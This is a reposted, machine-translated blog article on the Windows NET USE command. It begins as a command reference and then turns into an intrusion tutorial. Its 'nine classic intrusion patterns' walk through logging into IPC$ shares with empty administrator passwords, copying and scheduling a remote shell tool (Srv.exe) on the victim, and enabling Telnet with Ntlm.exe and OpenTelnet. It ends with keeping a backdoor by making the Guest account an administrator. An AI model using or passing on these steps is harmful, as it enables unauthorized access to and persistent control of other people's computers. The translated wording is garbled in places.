NET USE command detailed

Disclaimer: This article is reproduced content, thanks to the original author hard work. The original link is: http://www.cnblogs.com/chinahbzm/articles/1423875.html

1) Establish an empty connection:
NET use \\IP\ipc$ ""/user: "" (be sure to note that this line of command contains 3 spaces)

2) Establish a non-null connection:
NET use \\IP\ipc$ "password"/user: "username" (same 3 spaces)

3) Map the default share:
NET use Z: \\IP\c$ "password"/user: "username" (You can map the other side's C disk to your own z-disk, other disks and so on)
If ipc$ has been established with the target, it can be accessed directly with the ip+ drive letter +$, the specific command net use Z: \\IP\c$

4) Delete a ipc$ connection
NET use \\IP\ipc$/del

5) Delete shared mappings
NET use C:/del Delete mapped C-disk, other disk analogy
NET use */del Delete all, there will be a prompt request press Y to confirm

3 Viewing a shared resource for a remote host (but not the default share)
NET view \\IP

4 View the local host's shared resources (you can see the local default share)
NET share

5 List of user names for remote hosts
Nbtstat-a IP

6 Get a list of users of the local host
NET user

7 Viewing the current time of a remote host
NET time \\IP

8 Show local Host current service
net start

9 starting/shutting down local services
Net start service name/y
net stop service name/y

10 Mapping Remote Shares:
NET use Z: \\IP\baby
This command maps shared resources named Baby to the Z-disk

11 Deleting shared mappings
NET use C:/del Delete mapped C-disk, other disk analogy
NET use */del/y Delete all

12 copying files to a remote host
Copy \ Path \srv.exe \\IP\ shared directory name, such as:
Copy Ccbirds.exe \\*.*.*.*\c The files in the current directory to the other side C drive

13 Adding scheduled Tasks remotely
At \\IP time program name, such as:
At \\127.0.0.0 11:00am Love.exe
Note: The time to use the 24-hour system, the default search path (such as system32/) without adding a path, otherwise you must add the full path
14 Turn on Telnet for the remote host
Here to use a small program: Opentelnet.exe, each major download site has, but also need to meet four requirements:

1) The target is open ipc$ sharing
2) You need to have the Administrator password and account number
3) target to open the RemoteRegistry service, the user on the NTLM authentication
4) Valid for WIN2K/XP, NT untested
Command format: OpenTelnet.exe \\server account PSW NTLM authentication mode port
Examples are as follows: C:\>opentelnet.exe \\*.*.*.* administrator "" 1 90

15 Activate user/join Admin Group
1 Net UESR Account/active:yes
2 net localgroup Administrators Account/add

16 Turn off Telnet for the remote host
Also need a small program: ResumeTelnet.exe
Command format: ResumeTelnet.exe \\server account PSW
Examples are as follows: C:\>resumetelnet.exe \\*.*.*.* Administrator ""

17 Delete an established ipc$ connection
NET use \\IP\ipc$/del

Nine classic intrusion patterns
This intrusion mode is too classic, most of the IPC tutorials are introduced, I have come to cite, in this thank the original author! (I don't know which predecessor)

1. C:\>net use \\127.0.0.1\IPC$ ""/user: "admintitrators"
This is the "streamer" to sweep the user name is administrators, the password is "empty" IP address (empty password? Wow, good luck), if it is intended to attack, you can use this command to establish a connection with 127.0.0.1, because the password is "empty", So the first quotation mark is not input, the following double quotation mark is the user name, input administrators, the command can be completed successfully.
Before copying, be sure to use the net View \\IP command to look at each other's sharing situation
2. C:\>copy Srv.exe \\127.0.0.1\admin$
First copy Srv.exe up, in the Streamer Tools directory there is (here the $ is the Admin user's c:\winnt\system32\, we can also use C $, d$, which means that the B and D disk, which see you to copy to where to go).

3. C:\>net Time \\127.0.0.1
Check the time, found that the current time in 127.0.0.1 is 2002/3/19 11:00, the command completed successfully.

4. C:\>at \\127.0.0.1 11:05 Srv.exe
Use the AT command to start the Srv.exe bar (the time set here is faster than the host time, otherwise you how to start Ah, hehe!) ）

5. C:\>net Time \\127.0.0.1
Do you have time to find out? If the current time of 127.0.0.1 is 2002/3/19 11:05, then prepare to start the following command.

6. C:\>telnet 127.0.0.1 99
This will use the Telnet command, note that the port is 99. Telnet defaults to port 23, but we are using SRV to create a 99 port shell for us on the other side of the computer.
Although we can telnet up, but SRV is a one-time, the next login will be activated again! So we're going to set up a Telnet service! This is going to use NTLM.

7.c:\>copy Ntlm.exe \\127.0.0.1\admin$
Use the Copy command to upload the Ntlm.exe to the host (Ntlm.exe is also in the "Streamer" Tools directory).

8. C:\WINNT\SYSTEM32>NTLM
Enter NTLM boot (here c:\winnt\system32> refers to the other computer, running NTLM is actually let the program run on the other computer). When "Done" is present, it indicates that it has started normally. Then use "net start Telnet" to turn on the Telnet service!

9. Telnet 127.0.0.1, then enter the user name and password to enter the other side, the operation is as simple as operating on DOS! (Then what do you want to do? Do what you want to do, haha)

In case we add the guest activation to the admin group.
Ten. C:\>net User Guest/active:yes
Activating the Guest user of the other party

C:\>net User Guest 1234
Change the password of guest to 1234, or the password you want to set

c:\>net localgroup Administrators Guest/add
Change Guest to Administrator ^_^ (if the administrator password changes, the Guest account does not change, the next time we can use guest to access this computer again)

Alternatively, you can analyze the cause based on the returned error number:

Error number 5, Access denied: It is likely that the user you are using is not administrator rights, and first elevate the permissions;
Error number 51,windows Unable to find network path: network problem;
Error number 53, network path not found: IP address error, target not booting, target LanManServer service not started, Target has firewall (port filtering);
Error number 67, the network name could not be found: your LanmanWorkstation service was not started or the target was deleted ipc$;
Error number 1219, the supplied credential conflicts with an existing set of credentials: you have established a ipc$ with each other, please remove the re-connected;
Error number 1326, unknown user name or bad password: the reason is obvious;
Error number 1792, attempting to log on, but the network logon service does not start: The target Netlogon service is not started;
Error number 2242, the user's password has expired: The target has an account policy, forcing a periodic request to change the password

When you use this method to mask the network mapping feature, you only need to open the system's Run dialog box and execute the "cmd" string command in it, switch the system interface to MS-DOS command line state, and then execute the "net use X:/del" string command at the DOS prompt. You can disconnect the network map that partitions the network disk to "X", and to quickly disconnect all network mappings on the local computer, simply execute the "net use */del" string command.

NET USE command detailed